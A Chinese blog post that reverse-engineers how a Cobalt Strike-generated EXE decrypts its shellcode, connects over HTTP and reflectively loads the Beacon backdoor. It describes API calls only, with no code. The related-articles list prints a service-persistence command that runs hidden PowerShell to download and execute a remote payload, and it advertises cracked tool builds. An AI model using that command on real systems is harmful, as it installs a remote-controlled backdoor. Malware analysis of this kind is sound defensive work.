逆向分析Cobalt Strike安装后门

最新推荐文章于 2024-04-04 21:41:06 发布
最新推荐文章于 2024-04-04 21:41:06 发布
阅读量1.2k 收藏 18
点赞数 16
文章标签: 网络安全 系统安全 安全威胁分析 恶意软件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pandazhengzheng/article/details/136246623
版权

Cobalt Strike简介

Cobalt Strike是一款基于java的渗透测试神器,也是红队研究人员的主要武器之一,功能非常强大,非常适用于团队作战,Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等,至于Cobalt Strike详细怎么玩,我就不介绍了,网上很多教程,功能也很强大,我主要想从逆向的角度去分析一下Cobalt Strike安装后门的技术原理,跟踪一下它是如何与服务器进行连接,并安装Beacon后门模块的。

搭建测试环境

测试环境:  

1.服务端 kali 用于Cobalt Strike服务端   

2.攻击机 win7 用于Cobalt Strike客户端   

3.测试机 win7 测试安装Cobalt Strike的后门程序 

 工具 

Cobalt Strike 4.1中文版 

启动Cobalt Strike服务器,如下所示:

启动Cobalt Strike客户端,生成EXE后门,如下所示:

Cobalt Strike监听器的Payload可以自定义设置,我这里以Beacon HTTP为例,如下所示:

生成EXE后门之后在测试机上运行,客户端会提示有主机上线,开启beacon操作接口,如下所示:

后面就可进行各种操作了,这里就不介绍了,教程很多,也有很多不同的玩法,我主要对生成的EXE比较感兴趣,重点研究一下生成的EXE,是怎么运行的。

逆向跟踪分析

1.拼接字符串,如下所示:

2.创建线程,连接管道,如下所示:

3.通过VirtualAlloc分配内存空间,解密shellcode代码,如下所示:

4.解密出来shellcode代码,如下所示:

5.跳转执行解密出来的shellcode代码,如下所示:

6.shellcode代码,加载wininet.dll,如下所示:

7.调用InternetOpenA,InternetConnectA等函数连接服务器,如下所示:

8.调用HttpOpenRequestA,HttpSendRequestA等函数向服务器发送连接请求,如下所示:

9.调用VirtualAlloc分配内存空间,存放返回的数据,如下所示:

10.通过InternetReadFile循环读取服务器返回的数据,如下所示:

11.从服务器上返回的数据,如下所示:

分析返回的数据,为Cobalt Strike反射型注入后门模块beacon.dll,如下所示:

这样beacon的后装模块就安装成功了,就是之前我们在客户端上通过beacon的后门模块进行后面的操作了。

通过动态跟踪分析发现Cobalt Strike的Revere HTTP的ShellCode执行流程,如下所示:

wininet.dll->InternetOpenA->InternetConnectA->HttpOpenRequestA->HttpSendRequestA->VirtualAlloc->InternetReadFile,反射加载执行返回的beacon.dll后门模块。

上面对Cobalt Strike的Bean HTTP Reverse的Payload的实例进行了逆向分析,其他的Payload模块可以使用相同的方法进行跟踪分析,就不做介绍了,可自行进行深入的研究,其实做安全到最后都是相通的,基础安全研究才是安全的核心。

不忘初心

做安全不忘初心,方得始终,只要你做的事是对社会有意义的,能帮助别人就是有价值的事,就一定要坚持做到底,最后都会有回报,前段时间笔者获得了江苏省信息网络安全协会2019年的优秀个人奖,非常感谢协会朋友对笔者的认可,如何做一家伟大的企业,我觉得伟大的企业,一定是对客户,对社会,对国家,或者更大一点说是对全人类有贡献有帮助的企业,当你的客户提起你的企业的时候,会从内心觉得这家企业是做实事的,觉得你的产品和服务,实实在在地帮助他们解决了一些问题,给他们创造了一些价值,这样你就自然而然的会赚到钱,赚钱永远不是伟大企业的目标,只要是做对社会有贡献的事,对别人有帮助的事,让客户信任你的产品,满意你的服务,相信你的专业,就一定能赚到钱,伟大的企业,在别人的眼中,肯定不仅仅只是一家只会赚钱的企业,当你能真正帮助到企业,就一定可以赚到钱,客户也愿意与你合作,也愿意花钱购买你的产品和服务,只这样的企业将来才能越做越大,越做越强,最后成为一家伟大的企业,受到客户的尊敬。

坚持做对社会有贡献的事,坚持做对别人有帮助的事,身为一个安全研究人员,要不忘初心,当国家有需要的时候,有时间和机会一定要为国家网络安全事业尽自己的一点微薄之力,全球网络安全战已经开始,未来需要更多专业的安全研究人员,一起努力,共同进步。

熊猫正正
关注
  • 16
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
魔改CobaltStrike:二开及后门生成分析
mai1zhi2的博客
04-21 3007
一、概述: 这次文章主要介绍下Cobalt Strike 4.1相关功能的二开和后门(artifact.exe\beacon.exe)的生成方式,Cobalt Strike的jar包我已反编译,并改了下反编译后的bug,teamserver与agressor均能正常调试使用,附反编译后项目地址: https://github.com/mai1zhi2/CobaltstrikeSource 。若有不对的地方希望大伙指出,谢谢。后续将会再分享通讯协议与自定义客户端(后门)。PS:感谢Moriarty的分享课。
CobaltStrike后门生成
bring_coco的博客
05-05 4045
一.Payload介绍 Payload在渗透测试中大家可以简单地理解为一段漏洞利用/植入后门的代码或程序 二.Cobaltstrike生成后门 1.HTML Application(生成基于HTML的攻击载荷,比如可执行文件,Powershell,VBA) HTML Application用于生成hta类型的文件。HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差
简单的免杀流程,软件使用方法与一点思路(Cobalt-strike
最新发布
weixin_74182283的博客
04-04 1482
字面意思,就是恶意软件或者木马,通过对其进行修改,导致杀毒软件扫描时会默认这款恶意软件是个安全的软件,导致恶意软件成功上传到电脑。通常在渗透测试的过程中,想要进入别人内网,就需要通过一些木马或者一些程序上传至别人内网,从而得到对方内网的权限。正常情况下,linux内可能没啥杀毒软件,但windows系统下的杀毒软件就各种各样,而我们的木马刚传上去就会被杀掉,这时如果懂得如何去对上传的马做一个免杀,使其顺利通过防火墙就显得非常重要了。
网络攻防作业——学习使用cobaltStrike
yyy7654321的博客
06-28 941
生成Windows下可执行木马(一个有英语版的图,一个中文版的),放在指定的地方。在放在window系统的电脑中运行软件,在弹出阻止消息的时候点击信任运行。3.利用Cobaltstrike生成攻击后门,并通过“文件托管” 进行网络共享下载该后门,运行后门上线。2.利用Cobaltstrike生成攻击后门,并通过2种网络共享下载该后门,运行后门上线;1.利用Cobaltstrike生成攻击后门,并通过“文件托管” 进行网络共享。实验工具:VMware,edge,cs。1.登录cs,并生成后面放在指定路径。
153.网络安全渗透测试—[Cobalt Strike系列]—[生成hta/exe/宏后门]
qwsn
03-25 2430
一、后门简介 1、hta后门 2、exe后门 3、宏病毒后门 二、生成后门并测试 1、生成HTA后门并测试 2、生成exe后门并测试 3、生成宏病毒后门并测试
Cobalt Strike后渗透神器入门
2301_77147676的博客
03-27 286
你需要掌握的三大神器,metasploit、empire、cobalt strike。在前面的实验中,我们分别介绍了(漏洞利用)和empire(后门控制)。今天的主题是个,或许你早在上就看到过这个黄毛小子,kali自带的metasploit图形版软件:armitage。cobalt strike是armitage的升级版,跟着本篇文章,一起来捉个鸡啦,静享丝滑~作者:ailx10链接:https://zhuanlan.zhihu.com/p/261147503来源:知乎著作权归作者所有。
Cobalt Strike 可持续后门的使用(子篇9)
yyj1781572的博客
11-23 632
Cobalt Strike 可持续后门的使用
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
cobaltstrike中文版.zip
05-17
cobaltstrike中文版.zip
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和teamserver执行权限) ...2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd 即可启动 默认连接端口50050
cobaltstrike4.0-cracked.zip
07-04
这是Cobalt Strike4.0的无后门版本,该版本仅供学习使用,请勿用于非法途径,请时刻遵守国家法律。
CobaltStrike4.7
11-29
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序...
Cobalt Strike (CS) 逆向初探
悦分享
08-03 669
当进入第三段文件执行的时候,就算是真正开始了远控文件的旅行,不过那是另一段旅程了,就不在这篇文章里写了(必经本篇篇幅已经好多)。但是,还是还是简单的把那个文件的一些分析写在下面。考虑到已经进入一个远控软件的核心功能部分,按照我的想法,为了方便,还是把内存dump下来,通过静态和动态结合的方式来。因此,祭出Scylla。首先运行到新内存区域入口处:然后点转储内存:选择所处模块的区域,转储PE,因为该修复的都修复了,所以直接转pe文件,也不同修复转储了。(后面的.mem文件要不要都无所谓了)。.........
CobaltStrike逆向学习系列(6):Beacon sleep_mask 分析
SecSource_Stars的博客
01-11 403
这是[信安成长计划]的第 6 篇文章 关注微信公众号[信安成长计划] 0x00 目录 0x01 C2Profile 分析 0x02 set userwx “true” 0x03 set userwx “false” CobaltStrike 提供了一个内存混淆功能,它会在 Sleep 的时候将自身混淆从而避免一定的检测 0x01 C2Profile 分析 因为 sleep_mask 是从 C2Profile 中设置的,所以就需要先搞清楚 TeamServer 是如何解析的 很明显它还跟其他的设置项有关,
CobaltStrike视频教程
04-20
本套视频教程主要讲的CobaltStrike工具使用,通过学习这套视频教程可以深入了解CobaltStrike,全是用真实服务器与cdn进行实战练习,对后期渗透测试、溯源、反制有一个很大的提升。
捆绑后门的艺术--CobaltStrike backdoor分析
systemino的博客
08-06 2066
CobaltStrike(以下全部简称为CS)是渗透测试中常用的一个后渗透工具,它可以快速地生成后门并通过其控制目标主机。其中,捆绑型后门是攻击者较为喜欢的一种后门,因为其具有较好的隐蔽性及免杀效果。下面,就来剖析一下该类后门的捆绑及免杀原理。 1.后门制作 制作捆绑型后门前,先得创建一个监听器用于与后门通信,点击 Cobalt Strike->Listener创建一个监听器,填上IP...
cobalt strike开机自启动后门
mirror97black的博客
04-09 4946
前提:拿到cobalt strike的session 设置开机自启动服务 使用sc命令创建服务 sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1...
cobaltstrike生成后门对office宏反弹shell
qq_25768397的博客
08-24 1034
1、环境准备: cobaltstrike 3.14 win7企业版 office2016 注:cobaltstrike不能在win7运行 2、配置cobaltstrike服务端跟客户端,具体怎么配置省略,网上有教程。 3、生成后门,复制代码,配置office,勾上office开发工具,然后打开office开发工具,复制进去后保存,保存版本使用97-2003版本。 4、生成word后,直接双击,当双击时会提示启用宏就点启用。 5、打开cobaltstrike查看是否成功 ...
Cobaltstrike系列教程(二)Listner与Payload生成
热门推荐
J0o1ey Blog
08-01 1万+
0x000-前文 Cobaltstrike系列教程(一)简介与安装 https://bbs.ichunqiu.com/thread-52937-1-1.html PS:原本想完成日更目标的,但昨天在研究无线,就没更,今天加班~ 0x001-Listner(监听器)介绍 ①Cobaltstrike listner简介 可能有一些小白并不理解什么叫做listner,在此科普一下。 Listner(监...
CobaltStrike后门
08-25
Cobalt Strike是一种强大的渗透测试工具,它被广泛用于网络渗透测试和红队行动中。它提供了多种功能,包括创建和管理后门、进行远程访问和控制、执行各种攻击等。 Cobalt Strike后门功能主要是用来在目标系统上建立持久访问并保持对系统的控制。它可以通过多种方式植入后门,例如使用漏洞利用、社会工程学攻击或者钓鱼等手段。一旦后门建立成功,攻击者就能够远程访问目标系统,并执行各种操作,如文件传输、命令执行、截屏、键盘记录等。 需要注意的是,Cobalt Strike是一个合法的安全工具,但也经常被恶意攻击者用于非法目的。在使用Cobalt Strike或类似工具时,务必遵守法律法规,并获得相关授权和许可。同时,也要注意保护自己的网络安全,避免成为攻击的目标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊猫正正

请我喝杯咖啡吧

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值